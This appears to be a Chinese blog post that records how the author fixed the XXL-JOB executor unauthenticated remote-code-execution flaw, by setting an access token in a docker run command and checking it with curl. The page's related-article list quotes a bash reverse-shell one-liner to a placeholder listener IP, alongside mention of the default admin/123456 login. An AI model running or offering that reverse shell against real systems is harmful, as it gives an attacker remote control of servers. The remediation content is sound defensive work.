XXL-JOB executor 未授权远程代码执行漏洞【原理扫描】

最新推荐文章于 2026-06-22 17:38:29 发布
原创 最新推荐文章于 2026-06-22 17:38:29 发布 · 53 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#linux #运维

  近日,我们部署的服务器扫描到了xxl-job-admin定时任务的漏洞,需要进行修复,特此记录。

一、问题描述

详细描述:

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

二、修复思路

修复:

增加授权验证,配置 xxl.job.accessToken 防止未授权访问漏洞。

三、解决方案

具体步骤(容器部署):
(1)重新运行xxl-job-admin容器,加参数。

docker run -d --restart=always --network host \
  -e PARAMS="--spring.datasource.url=jdbc:mysql://192.168.1.1:3306/test?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai --spring.datasource.username=root --spring.datasource.password=123456 --spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver --xxl.job.accessToken=Abvsdf23459fdhsdg8fdg503" \
  -v /home/xxl-job:/data/applogs/xxl-job \
  --name xxl-job-admin \
  xxl-job-admin:2.4.1

(2)对应调用的应用程序修改配置文件,之后重启程序即可。(自定义复杂的随机字符串)

xxl.job.accessToken=Abvsdf23459fdhsdg8fdg503

四、验证

# 响应code500
curl -X POST "http://192.168.1.1:9090/xxl-job-admin/api/checkToken" -H "XXL-JOB-ACCESS-TOKEN: Abvsdf23459fdhsdg8fdg503"

# 响应code200
curl -X POST "http://192.168.1.1:9994/beat" -H "XXL-JOB-ACCESS-TOKEN: Abvsdf23459fdhsdg8fdg503"
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 358
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
XXL-JOB executor 未授权访问漏洞
韩束一叶子
05-10 2945
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。:
XXL-Job任务调度中心后台RCE和executor未授权访问漏洞
gzy1616的博客
01-10 2711
bin/bash -i >& /dev/tcp/监控ip/5555 0>&1。运行模式选择shell,使用在线的dnslog网站,判断出不出网。执行命令后刷新在线的Dnslog网站发现命令执行成功。首先我们在Linux中搭建好靶场。输入密码admin/123456。找到任务管理新建一个任务。
【Web安全】XXL-JOB框架SRC高频漏洞分析总结
水滴石穿
09-12 2749
XXL-JOB是国内主流的开源分布式任务调度框架,由徐雪里开发维护,以轻量易用、高可用、适配分布式场景等特性,广泛应用于互联网、金融等行业,承担定时任务调度、批量数据处理等核心业务。其架构核心为“调度中心(负责任务配置与触发)”与“执行器(负责任务实际运行)”,二者协同实现分布式任务管理。随着其部署范围扩大,低版本因安全设计不足,暴露出API未授权访问、默认弱口令、反序列化注入等高频漏洞,成为安全响应中心(SRC)常见安全事件诱因,可能导致服务器被控、业务数据泄露等严重后果。
实战复盘-从告警到溯源:XXL-JOB未授权漏洞的应急响应与内存马植入分析
weixin_29322553的博客
03-20 376
本文详细记录了XXL-JOB未授权漏洞的应急响应过程,从告警分析到漏洞确认,再到利用GLUE_GROOVY类型突破不出网限制并植入内存马的全流程。文章深入剖析了内存马的工作原理和实现细节,并提供了防御建议,帮助安全工程师提升应急响应能力。
从弱口令到高危漏洞xxl-job调度中心RCE实战与防御
weixin_30682415的博客
06-17 382
在分布式系统架构中,任务调度框架是核心组件,负责协调和管理后台任务的执行。其工作原理是通过中心化的调度节点(Admin)与分布式的执行节点(Executor)进行通信,实现任务的定时触发与分布式处理。这种架构的技术价值在于提升系统的可维护性与任务执行的可靠性,广泛应用于电商订单处理、数据同步、报表生成等关键业务场景。然而,当调度中心的管理后台存在身份认证缺陷时,整个系统的安全边界将面临严峻挑战。本文聚焦于企业级任务调度平台xxl-job,深入剖析其GLUE模式在线脚本编辑功能的安全风险。攻击者利用弱口令等初
记一次被通报的挖矿事件应急响应
Boom!脑洞大爆炸的博客
07-05 1798
某单位被上级单位通报,单位的出口IP和境外IP有异常通信行为,要求进行紧急处置。
Java序列化安全深度解析:从原生漏洞到Jackson/Protobuf实战方案
weixin_33924770的博客
06-17 442
序列化作为数据持久化与网络传输的基础技术,其核心原理是将对象状态转换为可存储或传输的格式。Java原生序列化机制因设计缺陷,在反序列化过程中会**自动调用对象的`readObject()`方法**,这构成了严重的安全隐患,攻击者可利用此特性构造恶意字节流执行任意代码。从技术价值看,安全的序列化方案能保障数据完整性、防止信息泄露,并提升系统稳定性。在应用场景上,JSON(特别是Jackson)因其显式映射特性成为Web API和微服务通信的首选,而Protocol Buffers则凭借高性能与强契约适用于RP
Linux 网络应用层协议定制实战:从黏包处理到 Jsoncpp 序列化
我哎GIS博客
06-17 609
Linux 网络应用层协议定制实战:从黏包处理到 Jsoncpp 序列化
记录从0到1制作 Linux To Go
kusunoki的博客
06-17 408
本文介绍了如何制作一个便携的 Linux To Go 系统盘,适合计算机专业或有显卡需求的用户使用。通过 Ubuntu 启动盘,将系统完整安装到移动硬盘/U盘中,避免了双系统或虚拟机的复杂设置。文章详细讲解了准备工作、启动盘制作、BIOS 设置、系统安装步骤,以及网卡和显卡驱动的安装方法。这种方案可在不同电脑上即插即用,保留了完整的 Linux 系统功能和性能。
Linux 单用户模式 vs 救援模式的区别
最新发布
weixin_53389944的博客
06-22 132
能看到GRUB、内核能加载、只是登录/配置出问题 → 用单用户模式,操作最快,不用外接介质;GRUB/内核/系统核心文件损坏、单用户根本进不去 → 用救援模式,独立外部环境兜底修复。补充:systemd体系里还有(本机救援目标,属于单用户类),和介质救援模式不是同一个东西,不要混淆。
Linux 设备驱动开发详解:基于最新的 Linux 4.0 内核》 第 1 章 Linux 设备驱动概述及开发环境搭建
qq_40843427的博客
06-21 317
本文介绍了Linux设备驱动的基本概念、功能及其在系统架构中的关键作用。主要内容包括: 设备驱动作为硬件与操作系统之间的接口层,实现了硬件无关性,为上层提供统一访问接口; 无操作系统时的裸机驱动开发模式,通过STM32 GPIO和UART驱动案例展示了直接寄存器操作方式; 对比了裸机驱动的特点(简单直接)与局限性(缺乏资源管理、无法并发访问等),为后续Linux驱动开发奠定基础。 (98字)
Linux 【06-head命令超详细教程】
qq_16313575的博客
06-22 178
head用于,默认打印文件前10行;也可接收管道输出,截取命令输出的头部数据,日常排查日志、读取配置、过滤输出高频使用。
imx6ull开发板,sd卡启动运行linux,手动给开发板的 emmc 做分区、烧系统
2301_79809746的博客
06-15 314
boot1 分区 其实也可以做U-Boot备份,boot0 + boot1 双备份据可以覆盖 U-Boot 冗余需求,p1 分区就有点多余了。imx6ull开发板的 U-Boot 版本是 2016.03 ,配置里没有 GPT 支持,分区表 支持 MBR ,属于2016年前后的技术栈。2. 启动分区(放内核、设备树、U-Boot环境变量的分区):保持只读属性,防止启动关键文件被误删,保障开机稳定性;A/B 独立分区: bootA,bootB ,rootfs A ,rootfs B,每个都是独立文件系统。
Linux 搭建及配置 DNS 服务器 — 实操指南
cpyaxjq的博客
06-17 292
本文是一篇关于在Linux系统上搭建和配置DNS服务器的实操指南。主要内容包括: DNS基础知识 DNS作用:将域名转换为IP地址 系统DNS配置文件解析(/etc/resolv.conf、/etc/hosts等) 常见DNS记录类型(A、AAAA、CNAME、MX等)及查询示例 DNS解析原理 解析流程图示:从根服务器到权威DNS的逐级查询 全球13组根服务器介绍 递归解析过程演示(使用dig +trace命令) BIND9服务器搭建 系统环境:Ubuntu 24.04 LTS 安装和配置BIND9服务
Linux 【07-tail命令超详细教程】
qq_16313575的博客
06-22 174
简写。
andoird13 + bazel 编译 Linux kernel
Android小码家
06-15 274
本文介绍了如何为Android 13模拟器编译和替换Linux内核的完整流程。主要内容包括: 确定当前模拟器内核版本(5.15.41-android13) 从Google官方仓库下载对应内核源码(common-android13-5.15分支) 修改内核配置,将virtio_blk和virtio_scsi驱动改为模块化编译 使用Bazel工具编译x86_64架构内核 替换Android源码中的预编译内核(prebuilts/qemu-kernel/x86_64/kernel-qemu) 启动模拟器验证新内核
linux alphine下的文件获取问题
小小小猿
06-22 90
摘要:服务文件对接功能在处理中文文件名时出现"文件不存在"错误,原因是JVM编码(ANSI_X3.4-1968)与文件系统编码(UTF-8)不匹配。解决方案包括: 环境层面:在容器中设置LANG=en_US.UTF-8和LC_ALL=en_US.UTF-8,确保JVM使用UTF-8编码(sun.jnu.encoding=UTF-8); 代码层面:用Files.exists()替代File.exists(),使用Files.size()和Files.newBufferedReader()等NIO API处理文
Linux 常见缩写命令英文全称
lsyeei的博客
06-17 501
本文整理了一系列常用Linux命令及其名称来源和功能简介,涵盖了系统管理、文件操作、网络工具、用户管理等多个方面。包括awk文本处理、bash默认shell、rpm软件包管理、ssh安全登录、ping网络测试等基础命令,以及chmod权限修改、rm文件删除、df磁盘空间查询等实用工具。每个命令均标注了英文全称和核心用途,如sudo(superuser do)用于特权执行、tar(tape archive)实现文件打包等,为Linux用户提供了快速查阅参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一条代码鱼

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值